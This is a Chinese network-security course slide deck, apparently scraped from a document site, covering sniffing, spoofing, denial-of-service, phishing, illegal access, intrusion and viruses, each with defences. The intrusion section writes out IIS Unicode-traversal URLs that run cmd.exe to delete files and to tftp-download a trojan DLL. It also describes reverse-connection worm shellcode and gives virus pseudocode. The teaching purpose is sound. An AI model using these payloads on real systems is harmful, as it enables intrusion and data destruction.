网络安全 课件 第2章 网络攻击_第1页
网络安全 课件 第2章 网络攻击_第2页
网络安全 课件 第2章 网络攻击_第3页
网络安全 课件 第2章 网络攻击_第4页
网络安全 课件 第2章 网络攻击_第5页
已阅读5页,还剩85页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

网络安全第二章第2章网络攻击本章主要内容网络攻击定义和分类;嗅探攻击;截获攻击;拒绝服务攻击;欺骗攻击;非法接入和登录;黑客入侵;病毒。2.1网络攻击定义和分类本讲主要内容网络攻击定义;网络攻击分类。一、

网络攻击定义网络攻击定义网络攻击是指利用网络存在的漏洞和安全缺陷对网络中的硬件、软件及信息进行的攻击,其目的是破坏网络中信息的保密性、完整性、可用性、可控制性和不可抵赖性,削弱、甚至瘫痪网络的服务功能。二、

网络攻击分类网络攻击分类主动攻击被动攻击

二、

网络攻击分类

1.主动攻击主动攻击是指会改变网络中的信息、状态和信息流模式的攻击行为。主动攻击可以破坏信息的保密性、完整性和可用性等。

二、

网络攻击分类

1.主动攻击篡改信息;欺骗攻击;拒绝服务攻击;重放攻击。

二、

网络攻击分类

2.被动攻击被动攻击是指不会对经过网络传输的信息、网络状态和网络信息流模式产生影响的攻击行为。被动攻击一般只破坏信息的保密性。

二、

网络攻击分类

2.被动攻击嗅探信息;非法访问;数据流分析。

2.2嗅探攻击

本讲主要内容嗅探攻击原理和后果;集线器和嗅探攻击;交换机和MAC表溢出攻击;嗅探攻击的防御机制。

一、

嗅探攻击原理和后果

1.嗅探攻击原理终端A向终端B传输信息过程中,信息不仅沿着终端A至终端B的传输路径传输,还沿着终端A至黑客终端的传输路径传输,且终端A至黑客终端的传输路径对终端A和终端B都是透明的。一、

嗅探攻击原理和后果

2.嗅探攻击后果嗅探攻击后果有以下三点。一是破坏信息的保密性。二是嗅探攻击是实现数据流分析攻击的前提。三是实施重放攻击。二、集线器和嗅探攻击由于集线器接收到MAC帧后,通过除接收端口以外的所有其他端口输出该MAC帧,因此,在有黑客终端接入集线器的情况下,集线器完成终端A至终端B的MAC帧传输过程的同时,将该MAC帧传输给黑客终端。三、交换机和MAC表溢出攻击由于交换机转发表中存在终端B对应的转发项,该转发项表明MAC地址为MACB的终端连接在端口2上。因此,当终端A发送的源MAC地址为MACA、目的MAC地址为MACB的MAC帧到达交换机时,交换机只从端口2输出该MAC帧。这种情况下,黑客终端即使与终端B连接在同一个交换机上,也无法接收终端A传输给终端B的MAC帧。三、交换机和MAC表溢出攻击

黑客终端不断发送源MAC地址变化的MAC帧,如发送一系列源MAC地址分别为MAC1、MAC2、…、MACn的MAC帧,使得交换机转发表中添加MAC地址分别为MAC1、MAC2、…、MACn的转发项,这些转发项耗尽交换机转发表的存储空间,当交换机接收到终端B发送的源MAC地址为MACB的MAC帧时,由于转发表的存储空间已经耗尽,因此,无法添加新的MAC地址为MACB的转发项,导致交换机以广播方式完成MAC帧终端A至终端B传输过程。四、嗅探攻击的防御机制对于通过集线器实现的嗅探攻击,需要有防止黑客终端接入集线器的措施。对于通过交换机实现的嗅探攻击,一是需要有防止黑客终端接入交换机的措施,二是交换机需要具有防御MAC表溢出攻击的机制。对于无线通信过程,嗅探攻击是无法避免的,这种情况下,需要对传输的信息进行加密,使得黑客终端即使嗅探到信息,也因为无法对信息解密而无法破坏信息的保密性。2.3截获攻击

本讲主要内容截获攻击原理和后果;MAC地址欺骗攻击;DHCP欺骗攻击;ARP欺骗攻击;生成树欺骗攻击;路由项欺骗攻击。

一、

截获攻击原理和后果

1.截获攻击原理黑客首先需要改变终端A至终端B的传输路径,将终端A至终端B的传输路径变为终端A→黑客终端→终端B,使得终端A传输给终端B的信息必须经过黑客终端。一、

截获攻击原理和后果

2.截获攻击后果获得用户的私密信息;篡改信息;实施重放攻击。二、MAC地址欺骗攻击

1.MAC帧正常转发过程终端C至终端A的MAC帧传输路径是:终端C→S3.端口1→S3.端口2→S2.端口2→S2.端口1→S1.端口3→S1.端口1→终端A,其中交换机S3通过转发表中MAC地址为MACA的转发项<MACA,2>确定S3.端口1→S3.端口2的交换过程。二、MAC地址欺骗攻击

2.MAC地址欺骗攻击过程一是接入以太网,黑客终端通过连接到交换机S3的端口3接入以太网。二是将自己的MAC地址修改为终端A的MAC地址MACA。三是发送以MACA为源MAC地址、以广播地址为目的MAC地址的MAC帧。转发表中MAC地址为MACA的转发项将通往黑客终端的交换路径作为目的MAC地址为MACA的MAC帧的传输路径。二、MAC地址欺骗攻击

3.MAC地址欺骗攻击防御机制一是阻止黑客终端接入以太网,二是阻止黑客终端发送的以伪造的MAC地址为源MAC地址的MAC帧进入以太网。三、

DHCP欺骗攻击

1.DHCP欺骗攻击原理黑客可以伪造一个DHCP服务器,并将其接入网络中,伪造的DHCP服务器中将黑客终端的IP地址作为默认网关地址,当终端从伪造的DHCP服务器获取错误的默认网关地址后,所有发送给其他网络的IP分组将首先发送给黑客终端。三、

DHCP欺骗攻击

2.DHCP欺骗攻击过程三、

DHCP欺骗攻击

2.DHCP欺骗攻击过程如果黑客终端想要截获所有LAN1内终端发送给其他局域网的IP分组,可以在LAN1内连接一个伪造的DHCP服务器,伪造的DHCP服务器配置的子网掩码和可分配的IP地址范围与正常DHCP服务器为LAN1配置的参数基本相同,但将默认网关地址设置为黑客终端地址53。如果LAN1内终端通过伪造的DHCP服务器获得网络信息,其中的默认网关地址是黑客终端地址,从而使得LAN1内终端将所有发送给其他局域网的IP分组先传输给黑客终端。三、

DHCP欺骗攻击

3.DHCP欺骗攻击防御机制防御DHCP欺骗攻击的关键是不允许伪造的DHCP服务器接入局域网,如以太网交换机端口只允许接收经过验证的DHCP服务器发送的DHCP提供和确认消息。四、

ARP欺骗攻击

1.ARP欺骗攻击原理四、

ARP欺骗攻击

1.ARP欺骗攻击原理根据接收终端的IP地址解析出接收终端的MAC地址的地址解析过程;终端发送ARP请求报文,请求报文中包含终端的IP地址和MAC地址对;接收ARP请求报文的终端在ARP缓冲区中记录IP地址和MAC地址对;IP地址为目标地址的终端回送ARP响应报文。四、

ARP欺骗攻击

1.ARP欺骗攻击原理终端A发送的ARP请求报文中给出IP地址IPB和MAC地址MACA对;其他终端ARP缓冲区建立IPB与MACA之间绑定;其他终端将目的IP地址为IPB的IP分组封装成以MACA为目的MAC地址的MAC帧。四、

ARP欺骗攻击

2.ARP欺骗攻击过程四、

ARP欺骗攻击

2.ARP欺骗攻击过程黑客终端发送将IPA和MACC绑定的ARP请求报文;路由器缓冲区中记录IPA和MACC绑定项;路由器将目的IP地址为IPA的IP分组封装成以MACC为目的MAC地址的MAC帧。四、

ARP欺骗攻击

3.ARP欺骗攻击防御机制终端没有鉴别ARP请求和响应报文中IP地址与MAC地址绑定项真伪的功能,因此,需要以太网交换机提供鉴别ARP请求和响应报文中IP地址与MAC地址绑定项真伪的功能,以太网交换机只继续转发包含正确的IP地址与MAC地址绑定项的ARP请求和响应报文。五、

生成树欺骗攻击

1.生成树协议工作原理生成树协议通过阻塞端口将一个原本存在环路的以太网拓扑结构转换成树形拓扑结构。五、

生成树欺骗攻击

1.生成树协议工作原理交换机优先级是可以配置的,交换机优先级最高的交换机成为根交换机。五、

生成树欺骗攻击

2.生成树欺骗攻击过程五、

生成树欺骗攻击

2.生成树欺骗攻击过程黑客终端分别通过两个以太网接口连接到交换机S1和S3;黑客终端配置最高交换机优先级,从而十七成为根交换机;黑客终端截获终端A、终端B与终端C之间传输的MAC帧。五、

生成树欺骗攻击

3.生成树欺骗攻击防御机制防御生成树欺骗攻击的前提是,不允许黑客终端参与网络生成树建立过程,即只在用于实现两个认证交换机之间互连的交换机端口启动生成树协议。六、

路由项欺骗攻击

1.路由项欺骗攻击原理正常情况下,路由器R1通往网络W的传输路径的下一跳是路由器R2,则通过路由器R2发送给它的目的网络为网络W的路由项计算出路由器R1路由表中目的网络为网络W的路由项。六、

路由项欺骗攻击

1.路由项欺骗攻击原理黑客终端向路由器R1发送一项伪造的路由项,该伪造的路由项将通往网络W的距离设置为0。路由器R1接收到该路由项后,选择黑客终端作为通往网络W的传输路径的下一跳,并重新计算出路由表中目的网络为网络W的路由项。六、

路由项欺骗攻击

2.路由项欺骗攻击过程六、

路由项欺骗攻击

2.路由项欺骗攻击过程黑客终端发送一项LAN4与其直接相连的路由项;路由器R1将通往LAN4传输路径上的下一跳改为黑客终端;路由器R1将目的网络是LAN4的IP分组转发给黑客终端。六、

路由项欺骗攻击

3.路由项欺骗攻击防御机制为了防御路由项欺骗攻击,路由器接收到路由消息后,首先需要鉴别路由消息的发送端,并对路由消息进行完整性检测,确定路由消息是由经过认证的相邻路由器发送,且路由消息传输过程中没有被篡改后,才处理该路由消息,并根据处理结果更新路由表。2.4拒绝服务攻击

本讲主要内容SYN泛洪攻击;Smurf攻击;DDOS。

一、SYN泛洪攻击1.SYN泛洪攻击原理

SYS泛洪攻击就是通过快速消耗掉Web服务器TCP会话表中的连接项,使得正常的TCP连接建立过程因为会话表中连接项耗尽而无法正常进行的攻击行为。一、SYN泛洪攻击2.SYN泛洪攻击过程

通过大量未完成的TCP连接耗尽Web服务器的会话表资源。一、SYN泛洪攻击3.SYN泛洪攻击防御机制

实施SYN泛洪攻击的前提是伪造源IP地址,因此,最直接的防御SYN泛洪攻击的办法是,使网络具有阻止伪造源IP地址的IP分组继续传输的功能。SYN泛洪攻击导致大量处于未完成状态的TCP连接,如果会话表只对处于完成状态的TCP连接分配连接项,SYN泛洪攻击将无法耗尽会话表中的连接项。二、

Smurf攻击1.Smurf攻击原理

黑客终端发送一个以攻击目标的IP地址为源IP地址的ICMPECHO请求报文;接收到ICMPECHO请求报文的终端向攻击目标发送ICMPECHO响应报文。二、

Smurf攻击1.Smurf攻击原理

黑客终端在网络中广播一个以攻击目标的IP地址为源IP地址的ICMPECHO请求报文,网络中所有终端向攻击目标发送ICMPECHO响应报文。二、

Smurf攻击2.Smurf攻击过程

黑客终端分别在LAN3和LAN4中广播一个以攻击目标的IP地址为源IP地址的ICMPECHO请求报文,LAN3和LAN4中所有终端向攻击目标发送ICMPECHO响应报文。耗尽攻击目标连接网络链路的带宽和攻击目标的处理能力。二、

Smurf攻击3.Smurf攻击防御机制

使网络具有阻止伪造源IP地址的IP分组继续传输的功能;路由器阻止以直接广播地址为目的IP地址的IP分组继续转发;主机系统拒绝响应ICMPECHO请求报文。三、

DDoS1.直接DDoS攻击

攻击组织者首先通过其他攻击手段攻陷大量主机系统,并植入攻击程序,然后,激活这些攻击程序。攻击程序产生大量无用的UDP报文或ICMPECHO请求报文,并将这些报文发送给攻击目标。三、

DDoS2.间接DDoS攻击

攻击组织者激活植入肉鸡中的攻击程序,攻击程序随机产生大量IP地址,并以这些IP地址为目的IP地址、以攻击目标的IP地址为源IP地址构建ICMPECHO请求报文。这些请求报文到达目的端后,由目的端产生以请求报文的源IP地址(攻击目标IP地址)为目的地址的ICMPECHO响应报文,大量ICMPECHO响应报文到达攻击目标。三、

DDoS3.DDoS攻击防御机制

防御DDoS攻击一是需要尽可能地减少肉鸡,这就要求连接在互联网上的主机系统能够具备防御病毒和黑客入侵的能力。二是使主机系统拒绝响应ICMPECHO请求报文。三是网络具有统计目的IP地址相同的ICMPECHO响应报文,或ICMP差错报告报文数量的能力,如果网络中单位时间内经过的目的IP地址相同的ICMPECHO响应报文,或ICMP差错报告报文的数量超过设定的阈值,网络能够丢弃部分ICMPECHO响应报文,或ICMP差错报告报文。2.5欺骗攻击

本讲主要内容源IP地址欺骗攻击;钓鱼网站。

一、源IP地址欺骗攻击1.源IP地址欺骗攻击原理

源IP地址欺骗是指某个终端发送IP分组时,不是以该终端真实的IP地址作为源IP地址,而是用其它终端的IP地址,或者伪造一个本不存在的IP地址作为IP分组的源IP地址的行为。2.源IP地址欺骗攻击防御机制网络接收到某个IP分组时,首先判别该IP分组的源IP地址是否与发送该IP分组的终端的IP地址一致,如果不一致,终止该IP分组的转发过程。二、钓鱼网站1.钓鱼网站实施原理

钓鱼网站是指黑客模仿某个著名网站的假网站,用户访问钓鱼网站过程是指用户用该著名网站的域名访问到黑客模仿该著名网站的假网站的过程,即虽然用户在浏览器地址栏中输入该著名网站的域名,但实际访问的是黑客模仿该著名网站的假网站。二、钓鱼网站2.钓鱼网站实施过程

伪造的DHCP服务器中给出错误的域名服务器地址;伪造的域名服务器中给出错误的与域名绑定的IP地址;导致用正确的域名访问到伪造的web服务器。二、钓鱼网站3.钓鱼网站防御机制

一是主机具有防御黑客入侵的能力,黑客无法修改主机信息。二是以太网交换机具有防止伪造的DHCP服务器接入的能力,只允许经过认证的DHCP服务器接入以太网。三是终端具有鉴别Web服务器的能力,证实Web服务器身份后,才对Web服务器进行访问。2.6非法接入和登录

本讲主要内容非法接入无线局域网;非法登录。

一、

非法接入无线局域网网络结构一、

非法接入无线局域网1.获得SSID黑客终端可以通过侦听信标帧或探测响应帧获得AP的SSID。一、

非法接入无线局域网一、

非法接入无线局域网2.非法接入过程黑客终端截获正常身份鉴别过程中交换的P、Y和IV;黑客终端求出K=P⊕Y;黑客终端得到AP发送的P′后,求出Y′=P′⊕K和K对应的IV。一、

非法接入无线局域网3.非法接入防御机制

防御黑客终端非法接入的主要方法是,AP不用通过一次性密钥K异或随机数P生成的密文Y来证明授权终端拥有共享密钥GK。二、非法登录1.登录过程终端A和终端B可以通过Telnet命令远程登录网络设备和Web服务器,对网络设备和Web服务器进行配置和管理。二、非法登录2.非法登录过程非法登录是指非授权用户远程登录网络设备和Web服务器,并对网络设备和Web服务器进行非法配置的攻击行为。二、非法登录3.非法登录防御机制一是使得授权用户正常登录时,以密文方式向网络设备和Web服务器传输用户身份标识信息,如用户名和口令。二是要求网络设备和Web服务器设置的口令必须具备一定长度,同时包含数字、大写字母、小写字母和特殊字符,使得黑客短时间内无法通过暴力破解来获得口令。2.7黑客入侵

本讲主要内容信息收集;扫描;渗透;攻击;黑客入侵防御机制。

一、

信息收集开放的网络服务;企业服务器域名和IP地址;企业信息;无线接入设备;其他一些信息。

二、

扫描获取网络拓扑结构PingTracert获取操作系统类型和版本侦听端口对置位FIN位TCP报文的反应侦听端口对置位SYN位,且同时置位其他无效标志位的报文的反应不同的初始序号不同的初始窗口值封装TCP报文的IP分组的DF位ICMP出错消息的频率限制ICMP消息内容

二、

扫描获取应用程序类型和版本端口扫描获取应用程序信息

三、

渗透1.植入木马病毒过程(1)利用Unicode漏洞植入木马/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+del+c:\inetpub\Unicode编码“%c0%2f”表示“/”“/scripts/..%c0%2f../winnt/system32/”=“scripts/../../winnt/system32/”

三、

渗透1.植入木马病毒过程

将木马服务器软件idq.dll存入TFTP服务器,然后通过在浏览器地址栏输入:/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+tftp+-i++get+idq.dll

三、

渗透

2.蠕虫病毒蔓延过程(1)缓冲区溢出

由于函数B使用缓冲区时没有检测缓冲区边界这一步,当函数B的输入数据超过规定长度时,函数B的缓冲区发生溢出,超过规定长度部分的数据将继续占用其他存储空间,覆盖用于保留函数A的返回地址的存储单元。三、

渗透

2.蠕虫病毒蔓延过程(2)扫描Web服务器

扫描Web服务器的第一步是确定IP地址产生方式,或是指定一组IP地址,然后,逐个扫描IP地址列表中的IP地址;或是随机产生IP地址。确定目标主机是否是Web服务器的方法是尝试建立与目标主机之间目的端口号为80的TCP连接,如果成功建立该TCP连接,表明目标主机是Web服务器。三、

渗透

2.蠕虫病毒蔓延过程(3)获取Web服务器信息

通过建立的目的端口号为80的TCP连接向目标主机发送一个错误的HTTP请求消息,目标主机回送的HTTP响应消息中会给出有关目标主机Web服务器的一些信息。三、

渗透

2.蠕虫病毒蔓延过程(4)通过缓冲区溢出植入并运行引导程序

一旦确定Web服务器存在缓冲区溢出漏洞,精心设计一个HTTP请求消息,Web服务器将该HTTP请求消息读入缓冲区时会导致缓冲区溢出,并运行嵌入在HTTP请求消息中的引导程序,引导程序和黑客终端建立反向TCP连接,并从黑客终端下载完整的蠕虫病毒并激活。蠕虫病毒一方面建立一个管理员账户,供黑客以后入侵用,一方面开始步骤(2)~(4),继续扩散病毒。四、

攻击

1.成功植入木马病毒后的攻击过程

ispc/scripts/idq.dll激活Web服务器“/scripts”目录下的文件idq.dll,并因此进入Web服务器的DOS命令行,ispc.exe是客户端软件的名称。ispc.exe和idq.dll是著名木马软件的客户端和服务器端程序。四、

攻击

2.蠕虫病毒蔓延后的攻击过程

自动执行蠕虫病毒的结果是在目标主机上启动Telnet服务,并建立具有管理员权限的用户。因此,黑客可以随时通过Telnet连接目标主机,获取目标主机中的信息资源。五、黑客入侵防御机制阻断黑客终端与攻击目标之间的传输通路;消除漏洞;检测主机。

2.8病毒

本讲主要内容恶意代码定义;恶意代码分类;病毒一般结构;病毒分类;病毒实现技术;病毒防御机制。

一、恶意代码定义代码是指一段用于完成特定功能的计算机程序,恶意代码是指经过存储介质和网络实现计算机系统间的传播,未经授权破坏计算机系统完整性的代码,它的重要特点是非授权性和破坏性。

二、恶意代码分类陷阱门是某个程序的秘密入口,通过该入口启动程序,可以绕过正常的访问控制过程;逻辑炸弹是包含在正常应用程序中的一段恶意代码,当某种条件出现,如到达某个特定日期,增加或删除某个特定文件等,将激发这一段恶意代码;二、恶意代码分类特洛伊木马也是包含在正常应用程序中的一段恶意代码,一旦执行这样的应用程序,将激发恶意代码。顾名思义,这一段恶意代码的功能主要在于削弱系统的安全控制机制;这里的病毒是狭义上的恶意代码类型,单指那种既具有自我复制能力,又必须寄生在其他实用程序中的恶意代码;蠕虫的特点有两个,一是独立完整程序,二是能够自动激活;Zombie(俗称僵尸)是一种具有秘密接管其他连接在网络上的系统,并以此系统为平台发起对某个特定系统的攻击的功能的恶意代码。三、病毒一般结构

programV:={gotomain;1234567;subroutineinfect-executable:={loop;file:=get-random-executable-file;if(first-line-of-file=1234567)thengotoloopelseprependVtofile;}subroutinedo-damage:={whateverda

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论